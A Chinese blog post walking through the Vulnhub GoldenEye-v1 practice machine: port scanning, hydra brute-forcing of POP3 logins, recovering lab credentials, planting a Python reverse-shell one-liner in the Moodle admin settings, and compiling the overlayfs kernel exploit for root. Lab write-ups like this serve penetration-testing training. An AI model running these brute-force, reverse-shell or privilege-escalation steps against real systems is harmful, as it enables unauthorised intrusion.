GoldenEye-黄金之眼

最新推荐文章于 2024-08-15 09:23:50 发布
最新推荐文章于 2024-08-15 09:23:50 发布
阅读量654 收藏 19
点赞数 22
分类专栏: 漏洞 渗透测试 红队 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TZXLzz/article/details/140476348
版权
漏洞 同时被 3 个专栏收录
2 篇文章 0 订阅
订阅专栏
渗透测试
2 篇文章 0 订阅
订阅专栏
红队
2 篇文章 0 订阅
订阅专栏

信息收集

探测主机IP

kali:192.168.30.142

靶机:192.168.30.143

探测端口:

nmap -p- 192.168.30.143 -Pn -sV

web渗透

发现有web端口,访问网页

发现要求/sev-home/登录,弹出一个登录框。

暂时没有发现什么信息,打开源代码,发现有两个js文件,第一个没有用,第二个有一段注释,根据经验,他像是一些引导提示

通过翻译知道,这是一段留言,提到两个人,Boris,Natalya,还有一段编码,通过解密可以得到。 InvincibleHack3r

登录成功

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port。//请记住,由于隐匿性安全性非常有效,因此我们已将 pop3 服务配置为在非常高的非默认端口上运行

这里提到了一个pop3端口,上面的端口刚好有一个pop3端口:55007

在terminal.js中提示说,可以会被爆破出密码,所以我们尝试爆破。爆破的用户名就是boris,natalya

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3

这样我们就得到两个用户名和密码。

boris\secret1!

natalya\bird

登录到boris用户有三封信件:

分别是来自root 和natalya的邮件,她可以破解Boris的密码。

之后我们看natalya的信息

在natalya的第二件信中找到信息

用户名: xenia
​
密码: RCP90rulez!
​
域名: severnaya-station.com
​
URL: severnaya-station.com/gnocertdir

信息提示要将severnaya-station.com域名加入 /etc/hosts

发现了Doak一个新用户的信件,使用hydra爆破

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3
​

nc登录

dr_doak

4England!

登录发现一个s3cret.txt文件

007,
​
I was able to capture this apps adm1n cr3ds through clear txt. 
​
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 
​
Something juicy is located here: /dir007key/for-007.jpg
​
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

指向了一个/dir007key/for-007.jpg 文件

看不出什么信息,下载图片分析

eFdpbnRlcjE5OTV4IQ==

解密:

xWinter1995x!

这个是管理员账号密码

登录之后修改设置

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.30.143",4444));os.dup2(s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

反弹到了shell

提权:

查看linux内核版本

下载相应的exp:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit

开启一个http服务

上传至靶机

由于靶机上没有gcc,所以使用clang代替

sed -i 's/gcc/clang/g' 37292.c

然后clang编译源代码,执行a.out

提权成功

得到flag

 总结:

首先通过端口扫描,在80端口进行渗透,使用hydra工具对pop3端口账号进行密码爆破,得到关键信息,进入web管理后台,在检查拼写的路径处写入反弹shell,建立blog,反弹到shell,然后利用linux版本漏洞,上传靶机exp,编译执行获得shell。

还可以使用msf   getshell,需要将后台spell engine改为PSpellShell,msf底层代码使用的是pspellshell。

参考链接:GlodenEye-v1黄金眼靶场复现 - FreeBuf网络安全行业门户

TZXLzz
关注
  • 22
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GoldenEye-v1靶场
qq_35355737的博客
06-05 1742
GoldenEye-v1靶场
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3408
vulnhub靶场{GoldenEye-v1靶场实战}
1-VulnHub-GoldenEye-v1
尼德霍格007
07-07 738
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:得到root权限&找到flag.txt 作者:尼德 时间:2021-7-7 一、信息收集 打开kali虚拟机和目标机Golden Eye-v1,两台虚拟机网络都处于NAT模式 kali查看本机IP段,我的是192.168.21.0/24 nmap扫一下本网段 由于我这里只开了两台虚拟机,一台是kali,另一台扫描到的就是Golden Eye-v1,可以看到目标机的IP地址是192.16
Vulnhub系列-GoldenEye-v1
Yasso的博客
01-04 634
靶机:192.168.12.132 kali:192.168.12.128 一、信息搜集 nmap -A -p- 192.168.12.132 查看80端口 web目录:/sev-home 访问发现需要用户名和密码 查看源代码 terminal.js 访问terminal.js文件 一串unicode编码 Boris的password 得到:用户名/密码=boris/InvincibleHack3r 成功登陆 查看源代码发现两个用户名 Natalya Boris 爆破密码 hydra -l Boris -P
GoldenEye-v1(vulnhub)靶机练习实践报告
黑战士的博客
05-28 870
1. 观察一定要仔细\2. 熟练使用工具\3. 看到网站后要考虑其用了什么框架,是否存在漏洞可被利用;查看网页源码,是否又隐藏信息。\4. 扩展知识面,对各种框架及其可能存在的漏洞进行总结整理。
【渗透-第1个项目】GoldenEye-v1
m0_62102520的博客
01-19 420
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ ---目录自行修改。Moole 2.2.3 exp cve ---> CVE-2013-3630 漏洞可利用 29324。-L 指定文本里面的用户,- P指的是字典文件 ,-s指的是端口,最后是服务。回到之前,可以知道它是admin的密码,登陆网页尝试,成功登陆admin的账户。nc 192.168.137.32 55007  ------登陆邮箱。------登陆密码。
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 992
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
vulnhub靶机----GoldenEye-v1
m0_55994898的博客
08-30 200
靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/靶机信息:靶机信息里面已经介绍,需要设置成主机模式,并且靶机使用的是DHCP服务,ip地址自动分配。
1、GoldenEye-靶机-百个项目计划
Labi的博客
01-14 1246
大家好,因为自己是一个刚入门网安不久的新人,现在想通过打一些靶机来进行学习,这里的计划是通过百个项目来进行实操,巩固自己的基础。发文也是记录一下自己的开始,文章会写的比较详细,让0基础的小白跟着做也会。本文仅用于技术讨论与研究,如用作非法用途作者概不负责。GoldenEye也是我们新手入门必打靶机,那我们就开始进入正文吧。
goldeneye-50.zip
04-26
《STK模型:goldeneye-50.zip的详解与应用》 STK,全称System Tool Kit,是一款广泛应用于航天、通信、气象等领域的高级仿真软件。它以其强大的建模和仿真能力,使得用户能够对复杂的系统进行精确的分析和预测。在...
GoldenEye-master
05-09
GoldenEyedos是一款十分强的的dos工具,特别是对于一些中小型网站。
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
Python-GoldenEye一个HTTPDoS测试工具
08-10
在这个名为"GoldenEye-master"的压缩包文件中,我们可以预期找到的是GoldenEye项目的源代码和相关资源。 在Python开发领域,测试工具如GoldenEye对于保障网络服务的稳定性和安全性至关重要。HTTP DoS攻击是通过发送...
GoldenEye:GoldenEye HTTP DoS 测试工具-开源
05-30
GoldenEye 是一个仅用于安全测试目的的 Python 应用程序! GoldenEye 是一个 HTTP DoS 测试工具。 被利用的攻击向量:HTTP Keep Alive + NoCache 请参阅自述文件了解更多详情。 请注意,这是 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8387
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 105
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
等保测评中的安全需求分析:构建精准的信息安全防护体系
最新发布
w13359990065的博客
08-15 320
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Future_2024的博客
08-13 516
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值